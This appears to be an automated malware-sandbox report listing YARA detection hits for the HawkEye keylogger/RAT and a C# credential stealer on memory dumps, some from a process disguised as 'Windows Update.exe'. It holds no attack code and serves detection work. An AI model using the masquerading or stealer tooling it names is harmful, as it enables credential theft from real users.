          Source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
